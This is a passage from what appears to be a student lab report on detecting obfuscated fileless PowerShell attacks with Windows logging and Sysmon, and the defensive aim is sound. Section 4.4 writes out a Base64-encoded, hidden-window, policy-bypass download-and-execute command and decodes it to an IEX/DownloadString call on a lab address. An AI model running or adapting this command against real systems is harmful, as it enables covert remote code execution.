        <w:t xml:space="preserve">Stage 2 — Telemetry augmentation: install Sysmon with the SwiftOnSecurity configuration to obtain process-lineage and hash data not captured by native Windows logging alone (Section 4.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 3 — Controlled attack simulation: execute a single, representative obfuscated PowerShell command modelled on real-world fileless download-and-execute behaviour, run only against a non-routable internal test address to avoid any real network impact (Section 4.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 4 — Detection and correlation: search Event Viewer for the resulting log entries, correlate Script Block Logging output against Sysmon process-creation telemetry, and extract indicators of compromise (Sections 4.5, 5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">All testing was confined to an isolated virtual machine on a NAT-only virtual network with no bridged access to any production system, and the simulated payload address (10.0.2.15) was deliberately unreachable so that no code from any external source was ever actually downloaded or executed — only the PowerShell invocation itself, and its logging footprint, were of interest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab consisted of a single Windows 10 x64 virtual machine running under VMware Workstation on a host laptop, allocated standard resources sufficient for normal desktop use (no special hardware was required). The VM was placed on VMware's NAT network mode, which allows outbound internet access for downloading Sysmon and its configuration file while presenting no inbound attack surface from the host's local network — an appropriate balance for a lab that intentionally executes attack-like commands. A local, non-domain administrator account was used throughout, reflecting the fact that this project targets host-level visibility rather than Active Directory-specific detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Test Design Rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than testing many different attack variants, the project deliberately used a single, carefully chosen command that combines four properties commonly seen together in real intrusions: Base64 obfuscation, a hidden window, an execution-policy bypass, and a fileless, memory-only payload delivery mechanism (WebClient.DownloadString piped into Invoke-Expression). This combination was chosen because it is representative of publicly documented real-world tradecraft (for example, in commodity loaders and post-exploitation frameworks) rather than being an artificial worst-case constructed purely to be easy to detect. Testing one representative command thoroughly, and fully explaining every log artefact it produces, was judged more valuable for this report than testing many variants shallowly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Ethical and Safety Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Three safeguards kept the simulation safe and within the bounds of legitimate coursework. First, the target address used in the payload (10.0.2.15) is a private, non-routable address that was not reachable from the test VM, so the download-and-execute step could never actually succeed — only the attempt, and its logging footprint, was captured. Second, all activity was confined to an isolated VM with no bridged connectivity to any production network, university system, or third party. Third, no credentials, personal data, or real organisational information were used or captured at any point; all evidence shown in this report originates from a disposable lab account on a disposable virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Enabling PowerShell Script Block, Module, and Transcription Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the Local Group Policy Editor (gpedit.msc), the following settings were enabled under Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn on PowerShell Script Block Logging — Enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn on Module Logging — Enabled, Module Names set to "*" (all modules)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn on PowerShell Transcription — Enabled, output directory C:\PS_Transcripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4381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3811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 Local Group Policy Editor showing Script Block Logging, Module Logging, and Transcription all set to Enabled under the Windows PowerShell policy node.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4191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057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 PowerShell Transcription policy configured with output directory C:\PS_Transcripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">With these three settings active, script block executions are written to Event ID 4104, module pipeline activity to Event ID 4103, and full session transcripts to disk, all under Applications and Services Logs → Microsoft → Windows → PowerShell → Operational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Command-Line Process Creation Auditing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, Windows records that a process was created (Event ID 4688) but omits the command-line arguments used to launch it — the single most useful field for identifying malicious flags such as -EncodedCommand. This was enabled via two policy settings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Configuration → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Detailed Tracking → Audit Process Creation (Success)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Configuration → Administrative Templates → System → Audit Process Creation → "Include command line in process creation events" (Enabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">gpupdate /force was run afterward to apply both policies immediately rather than waiting for the default background refresh interval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Installing and Configuring Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon v15.21 was installed with the SwiftOnSecurity community configuration using the following PowerShell commands, run from an elevated session:</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Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "C:\Sysmon.zip"
Expand-Archive C:\Sysmon.zip -DestinationPath C:\Sysmon
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile "C:\Sysmon\sysmonconfig-export.xml"
cd C:\Sysmon
.\Sysmon64.exe -accepteula -i sysmonconfig-export.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="43815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524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 Sysmon64 and SysmonDrv services started successfully following installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation was verified with .\Sysmon64.exe -c, which printed the full loaded ruleset — process creation, network connection, and DNS query filters drawn from the SwiftOnSecurity template — confirming both the Sysmon64 service and its SysmonDrv kernel driver were running and actively filtering events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Simulating a Representative Attack Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">A single PowerShell command was constructed to model a realistic fileless, obfuscated attack pattern: a Base64-encoded invocation that suppresses its console window, bypasses the local execution policy, and uses .NET's WebClient class to download and immediately execute remote script content in memory via Invoke-Expression (IEX), without ever writing a file to disk.</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powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgAxADUALwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded, the payload is: IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.15/payload.ps1'). This address is a non-routable internal test address and was never actually reachable, so no external code was downloaded or executed at any point; the objective was solely to generate the logging footprint an equivalent real attack would leave behind. The command was run manually from within an already-open elevated PowerShell session on the test VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Detecting the Activity in Event Viewer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications and Services Logs → Microsoft → Windows → PowerShell → Operational was searched for Event ID 4104. Script Block Logging successfully decoded the Base64 payload and logged the plain-text malicious command, despite the obfuscation used to launch it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4381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771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 Event ID 4104: decoded script block revealing the IEX/DownloadString payload behind the Base64-encoded command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">This was cross-referenced with Sysmon Event ID 1 (Applications and Services Logs → Microsoft → Windows → Sysmon → Operational), which confirmed the process launch, the still-encoded command line, and — critically — the parent process, integrity level, and SHA256 hash of the executing binary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="12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28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 Sysmon Event ID 1: process creation showing CommandLine, ParentImage, IntegrityLevel, and SHA256 hash of powershell.exe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">In this run the ParentImage was itself powershell.exe, since the command was launched manually from an existing elevated session rather than via a phishing document or script host. In a real attack this parent-child relationship is one of the strongest signals available: a chain such as winword.exe → powershell.exe or outlook.exe → powershell.exe is a far stronger indicator than powershell.exe launching a child powershell.exe, which can also occur during legitimate administrative scripting. Section 6 discusses this limitation and its implications further. Command-line process auditing (Event ID 4688) was also configured and enabled as a third, corroborating log source for the raw command line, though it was not captured as a report figure in this run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Verification and Testing Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Before the attack simulation was run, each logging control was independently verified rather than assumed to be working: the Group Policy settings were confirmed as "Enabled" in gpedit.msc directly (Figures 4 and 5), gpupdate /force was run and returned without error, and Sysmon's own -c flag was used to print its active configuration and confirm both the Sysmon64 service and SysmonDrv kernel driver had started (Figure 6). Only after this baseline was confirmed working was the test command executed, ensuring that a successful detection in Section 4.5 could be attributed to the logging configuration itself rather than to chance or to a control that happened to already be present by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7 Reproducibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Every command shown in Sections 4.1 through 4.4 is reproduced verbatim in the accompanying GitHub repository (see the repository URL on the cover page), organised into a scripts folder alongside the exported Sysmon configuration and a copy of the Group Policy settings summarised in Appendix C. This was a deliberate design choice: a reader should be able to rebuild this exact lab on their own Windows 10 virtual machine from the repository alone, without needing to re-derive any configuration step from this report's prose. The commit history in the repository also documents the order in which these steps were actually performed during the project period, rather than the polished, linear order in which they are presented here for readability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Results and Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab produced a complete, three-source evidence chain for the simulated attack, summarised below.</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60"/>
      </w:tblGrid>
      <w:t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Log Source</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Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="446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What it Revealed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PowerShell Operational (Script Block Logging)</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4104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4460"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fully decoded malicious script content (IEX / WebClient / DownloadString), despite Base64 obfuscation at launch</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Sysmon Operational</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 (Process Creation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4460"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Raw command line, parent process image, integrity level, and SHA256 hash of powershell.exe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 (Process Creation Auditing)</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4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="446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Configured and enabled as a corroborating raw command-line source; not captured as a figure in this run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Indicators of Compromise (IOCs) Observed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500"/>
        <w:gridCol w:w="5560"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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Significance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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-EncodedCommand / -enc flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Obfuscates payload from casual inspection and simple string-matching AV signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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-WindowStyle Hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker hides the console window from the logged-in user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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-ExecutionPolicy Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Circumvents the script execution restriction policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Net.WebClient / IEX pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fileless download-and-execute; payload never touches disk — confirmed via Event 4104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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SHA256 of powershell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">54DD55E1C2373DEED25C2776F553C632E58C4E56A0E4639DFD54EE97EA... — captured via Sysmon Event 1 for hash-reputation lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Unusual parent process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
